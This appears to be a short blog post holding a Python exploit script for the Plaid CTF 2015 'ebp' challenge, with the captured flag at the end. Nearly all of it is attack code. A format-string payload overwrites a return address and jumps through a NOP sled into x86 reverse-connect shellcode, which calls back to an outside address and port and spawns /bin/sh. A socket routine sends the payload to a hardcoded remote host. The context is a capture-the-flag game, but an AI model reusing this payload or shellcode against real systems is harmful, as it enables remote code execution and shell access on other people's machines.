ETC Plaid CTF 2015 - ebp LF0827 2015. 4. 21. 16:55 import struct from * import socket from * import time p = lambda x: struct.pack("<L", x) format_str = "%134521152c%4$n" dummy_1 = "A"*177+"BBBB" ret_shellcode = p(0x0804a380) dummy_2 = "B"*500 NOP = "\x90"*80 # 74byte , reverse connect shellcode = ("\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02" "\x89\xe1\xcd\x80\x92\xb0\x66\x68" "\x01\x01\x01\x01"#ip 1.1.1.1 "\x66\x68" "\x05\x39"#port 1337 "\x43\x66\x53\x89\xe1\x6a\x10\x51" "\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0" "\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52" "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" "\xcd\x80") payload = format_str + dummy_1 + ret_shellcode + dummy_2 + NOP + shellcode host = "52.6.64.173" port =4545 #host = "192.168.0.13" #port = 9001 s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) sleep(5) s.send(payload) sleep(5) s.close() #flag : who_needs_stack_control_anyway?